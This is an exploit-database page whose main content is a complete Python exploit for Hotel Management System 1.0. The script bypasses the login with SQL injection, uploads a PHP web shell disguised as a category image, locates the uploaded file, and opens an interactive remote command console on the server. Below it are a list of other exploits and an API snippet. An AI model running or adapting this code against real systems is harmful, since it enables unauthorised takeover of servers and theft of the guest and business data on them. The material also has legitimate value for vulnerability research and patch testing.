To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"Hotel Management System 1.0 - Remote Code Execution (Authenticated)"

Author

Exploit author

Aporlorxl23

Platform

Exploit platform

php

Release date

Exploit published date

2020-10-16

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
# Exploit Title: Hotel Management System 1.0 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020-09-23
# Exploit Author: Eren Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14458/hotel-management-system-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip
# Version: 1.0
# Tested on: Windows/Linux - XAMPP Server
# CVE : N/A

# Setup: pip3 install bs4 .

# Exploit Code :

import requests,sys,string,random
from bs4 import BeautifulSoup

def get_random_string(length):
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str

session = requests.session()
Domain = ""
RandomFileName = get_random_string(5)+".php"
def Help():
print("[?] Usage: python AporlorRCE.py <Domain>")

def Upload():
burp0_url = Domain+"/admin/ajax.php?action=save_category"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0)
Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language":
"tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "
http://192.168.1.104/admin/index.php?page=categories", "X-Requested-With":
"XMLHttpRequest", "Content-Type": "multipart/form-data;
boundary=---------------------------11915271121184037197158049421",
"Connection": "close"}
burp0_data = "-----------------------------11915271121184037197158049421\r\nContent-Disposition:
form-data; name=\"id\"\r\n\r\n\r\n
-----------------------------11915271121184037197158049421\r\nContent-Disposition:
form-data; name=\"name\"\r\n\r\n1\r\n
-----------------------------11915271121184037197158049421\r\nContent-Disposition:
form-data; name=\"price\"\r\n\r\n1\r\n
-----------------------------11915271121184037197158049421\r\nContent-Disposition:
form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type:
application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n
-----------------------------11915271121184037197158049421--\r\n"
try:
Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
if Resp.text == "1":
print("[+] Shell Upload Success")
else:
print("[-] Shell Upload Failed")
except:
print("[-] Request Failed")
Help()

def Login():
burp0_url = Domain+"/admin/ajax.php?action=login"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0)
Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language":
"tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "
http://localhost/fos/admin/login.php", "Content-Type":
"application/x-www-form-urlencoded;
charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"}
try:
Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data)
if Resp.text == "1":
print("[+] Login Success")
else:
print("[+] Login Failed")
except:
print("[-] Request Failed")
Help()

def FoundMyRCE():
global FileName
burp0_url = Domain+"/admin/index.php?page=categories"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0)
Gecko/20100101 Firefox/68.0", "Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip,
deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
try:
Resp = session.get(burp0_url, headers=burp0_headers)
Soup = BeautifulSoup(Resp.text, "html5lib")
Data = Soup.find_all("img")
for MyRCE in Data:
if RandomFileName in MyRCE["src"]:
FileName = MyRCE["src"].strip("../assets/img/")
print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/"))
except:
print("[-] Request Failed")
Help()

def Terminal():
while True:
Command = input("Console: ")
burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command
try:
Resp = session.get(burp0_url)
print(Resp.text)
except KeyboardInterrupt:
print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23")
except:
print("[-] Request Error")
if __name__ == "__main__":
if len(sys.argv) == 2:
Domain = sys.argv[1]
Login()
Upload()
FoundMyRCE()
Terminal()
else:
Help()
Release Date Title Type Platform Author
2020-11-20 "Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)" local windows ZwX
2020-11-20 "Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)" local windows "Vincent Wolterman"
2020-11-20 "Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit" local windows stresser
2020-11-20 "WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-11-20 "IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow" local windows "Paolo Stagno"
2020-11-19 "Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)" dos windows "Vincent Wolterman"
2020-11-19 "M/Monit 3.7.4 - Privilege Escalation" webapps multiple "Dolev Farhi"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "PESCMS TEAM 2.3.2 - Multiple Reflected XSS" webapps multiple icekam
2020-11-19 "M/Monit 3.7.4 - Password Disclosure" webapps multiple "Dolev Farhi"
Release Date Title Type Platform Author
2020-11-13 "Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)" webapps php Aporlorxl23
2020-10-16 "Hotel Management System 1.0 - Remote Code Execution (Authenticated)" webapps php Aporlorxl23
2020-09-24 "Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated)" webapps php Aporlorxl23
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48888/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.